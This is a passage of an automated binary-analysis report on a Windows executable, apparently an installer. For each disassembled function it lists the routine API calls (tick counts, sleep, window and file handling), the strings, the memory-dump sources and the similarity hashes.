                                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                    • API String ID: 390214022-3304407042
                                                                                    • Opcode ID: 1357a6a6f4ac0e338640df696ce31ab3616580a8c460ec0e97379f23ea9106e4
                                                                                    • Instruction ID: 7d9515a221cbc80ce02f792d78276580e8b66b65743a39b66aad4c04d9ca5984
                                                                                    • Opcode Fuzzy Hash: 1357a6a6f4ac0e338640df696ce31ab3616580a8c460ec0e97379f23ea9106e4
                                                                                    • Instruction Fuzzy Hash: E7812B70A40209AFDF14EBE4D882BDEBBB6FF84304F504569E800B7291D778AE45CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                                                    • GetTickCount.KERNEL32 ref: 00408E4F
                                                                                    • GetTickCount.KERNEL32 ref: 00408E67
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                                                    • GetTickCount.KERNEL32 ref: 00408EC1
                                                                                    • GetTickCount.KERNEL32 ref: 00408EF8
                                                                                    • GetTickCount.KERNEL32 ref: 00408F22
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountTick$CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 3968769311-0
                                                                                    • Opcode ID: 6ac2be8b98c6d59f6bfb7c2bc899f414c467b6e539e9ece706351b94971b3cf7
                                                                                    • Instruction ID: 6a262f9eb7bf8d50cb6d4ed5a75cfeecc0694df2e1247547c03083db5600c3d5
                                                                                    • Opcode Fuzzy Hash: 6ac2be8b98c6d59f6bfb7c2bc899f414c467b6e539e9ece706351b94971b3cf7
                                                                                    • Instruction Fuzzy Hash: C74171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006A490C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A4938
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A4951
                                                                                    • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A497B
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 006A4999
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandle$AttributesCloseCreateModule
                                                                                    • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                                                    • API String ID: 791737717-340263132
                                                                                    • Opcode ID: 215bef192cda9fc5dba6ec6f643ef1e2663aac3d5f7e380147f051abfc637afe
                                                                                    • Instruction ID: 721dd7993c735447edb6cc92a4eac4eb3665cfe7763642c980e607850eaa0253
                                                                                    • Opcode Fuzzy Hash: 215bef192cda9fc5dba6ec6f643ef1e2663aac3d5f7e380147f051abfc637afe
                                                                                    • Instruction Fuzzy Hash: A711086078030427F520717B5C8AFBB268E8BD376DF10023ABA18DA3C3EDD99D52059E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                                                    • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                    • API String ID: 4275029093-79381301
                                                                                    • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                                    • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                                                    • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                                    • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005CD18C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 005CD19D
                                                                                      • Part of subcall function 004EE230: EnterCriticalSection.KERNEL32(?,00000000,004EE49F,?,?), ref: 004EE278
                                                                                    • SelectObject.GDI32(0068C9D4,00000000), ref: 005CD1BF
                                                                                    • GetTextExtentPointW.GDI32(0068C9D4,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CD1D3
                                                                                    • GetTextMetricsW.GDI32(0068C9D4,?,00000000,005CD218,?,00000000,?,?,0068C9D4), ref: 005CD1F5
                                                                                    • ReleaseDC.USER32 ref: 005CD212
                                                                                    Strings
                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CD1CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                    • API String ID: 1334710084-222967699
                                                                                    • Opcode ID: cfdea7413595acbddd1e106899056d90e4d8163f6ab9ae2ba1f39e21ef6df673
                                                                                    • Instruction ID: 7c54d4053370f3abf143933d0ccd8ed0548831f5c72a22e7813bae608c756ede
                                                                                    • Opcode Fuzzy Hash: cfdea7413595acbddd1e106899056d90e4d8163f6ab9ae2ba1f39e21ef6df673
                                                                                    • Instruction Fuzzy Hash: 6C016DBAA54204BFD700DEE9CC41FAEB7FCEB89714F51047AB604E7281D678AE008724
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                    • API String ID: 3320372497-2970929446
                                                                                    • Opcode ID: 045d3ad08753bf338bfa42345213cc89658a5cf1a888b84c100e5d4f8ba8bf1a
                                                                                    • Instruction ID: 268cd0542ea206bc9f0d4c864baa5783ee04774fe02170aeb16690cb3bd490d1
                                                                                    • Opcode Fuzzy Hash: 045d3ad08753bf338bfa42345213cc89658a5cf1a888b84c100e5d4f8ba8bf1a
                                                                                    • Instruction Fuzzy Hash: CAF044A0A4438079FB10F7A19C57F7B2729D741B14F14152FB214791D2C6BD5CC48AA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00431714, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317C9
                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317E5
                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0043181E
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0043189B
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318B4
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 004318EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                    • String ID:
                                                                                    • API String ID: 351091851-0
                                                                                    • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                    • Instruction ID: d043b24a0edc3b3be54f954eb6f8b3249bac98b3ef8f213e332385a6eed1b33d
                                                                                    • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                    • Instruction Fuzzy Hash: 0951ED75A012299FCB26DB59CC91BDAB3FCAF4C304F4451EAE508E7211D634AF858F68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AD100, Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006AD11C
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B6179,00000000,006B6AB5), ref: 006AD14B
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006AD160
                                                                                    • SetWindowLongW.USER32 ref: 006AD187
                                                                                    • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AD1A0
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AD1C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Show
                                                                                    • String ID:
                                                                                    • API String ID: 3609083571-0
                                                                                    • Opcode ID: 8b1a257cd4f0fc434c799baa0a4b55eac680d398dea80ae756d55330fe6ca4da
                                                                                    • Instruction ID: e0796330955e18cad47395dd65cec407d9ab9d814e750fdff8721624bbe0e900
                                                                                    • Opcode Fuzzy Hash: 8b1a257cd4f0fc434c799baa0a4b55eac680d398dea80ae756d55330fe6ca4da
                                                                                    • Instruction Fuzzy Hash: 9F114C75B45200AFC700EB68DC81FE277E9AB8E710F058296FA158B3F2CB75AC409B40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                                                    • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                                                    • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                                                    • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: e7e71c79c8b2f7f4141069f16e0a27a38b71a8b4eb915ec7efac4787ea8505e0
                                                                                    • Instruction ID: cf671527993281747ba66e579e9841af11c1d4a0360e4ae8ae7f13ecf7528b2d
                                                                                    • Opcode Fuzzy Hash: e7e71c79c8b2f7f4141069f16e0a27a38b71a8b4eb915ec7efac4787ea8505e0
                                                                                    • Instruction Fuzzy Hash: 3EC1F072601B518FDB15CF69E884727BBA2FB85310F08827FD4159B3D5C2B9A841CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00615224, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 239windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006152A1
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006152C8
                                                                                    • SetForegroundWindow.USER32(?,00000000,006155A0,?,00000000,006155DE), ref: 006152D9
                                                                                    • DefWindowProcW.USER32(00000000,?,?,?,00000000,006155A0,?,00000000,006155DE), ref: 0061558B
                                                                                    Strings
                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00615413
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessagePostWindow$ForegroundProc
                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                    • API String ID: 602442252-3182603685
                                                                                    • Opcode ID: ad64c6b591af40ea4ba5f545b99f93c9333cd1e0c09a555d573a4fe1ca73c04e
                                                                                    • Instruction ID: d9496450f22983edaa4d95273014296636a6dee02a04e0b8031e0d1d01461ad4
                                                                                    • Opcode Fuzzy Hash: ad64c6b591af40ea4ba5f545b99f93c9333cd1e0c09a555d573a4fe1ca73c04e
                                                                                    • Instruction Fuzzy Hash: 4291E134A04A04EFD711CF29D851F99FBF7EB89700F1584AAF8069B7A1D638AD84CB14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B7254, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006B750A,?,?,00000000), ref: 006B729A
                                                                                      • Part of subcall function 005C61D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C61EB
                                                                                      • Part of subcall function 00424018: SetCurrentDirectoryW.KERNEL32(00000000,?,006B72C2,00000000,006B74D1,?,?,00000005,00000000,006B750A,?,?,00000000), ref: 00424023
                                                                                      • Part of subcall function 005C5D2C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C5DC1,?,?,?,00000001,?,0060FCDE,00000000,0060FD49), ref: 005C5D61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                                    • API String ID: 3312786188-1660910688
                                                                                    • Opcode ID: 9bac32933d93267d62a0efbfbf38caf58aabf4bae368766dc52fc197654038be
                                                                                    • Instruction ID: 9c0d9b5f261d395dc086ceef7e8291460dcd09bff1b52f9da0bdf24afaf5186f
                                                                                    • Opcode Fuzzy Hash: 9bac32933d93267d62a0efbfbf38caf58aabf4bae368766dc52fc197654038be
                                                                                    • Instruction Fuzzy Hash: 5841A274A006159FC700EFA4CC52E9EBBF6FBC8300B508465F801A7761DB34AE40DB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006248D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 00624902
                                                                                    • GetExitCodeProcess.KERNEL32 ref: 00624925
                                                                                    • CloseHandle.KERNEL32(?,00624958,00000001,00000000,000000FF,000004FF,00000000,00624951), ref: 0062494B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                    • API String ID: 2573145106-3235461205
                                                                                    • Opcode ID: 732e9f8b326961f4a5555d537b9d01a6aab9f08cc06af6535321f619a3cc4655
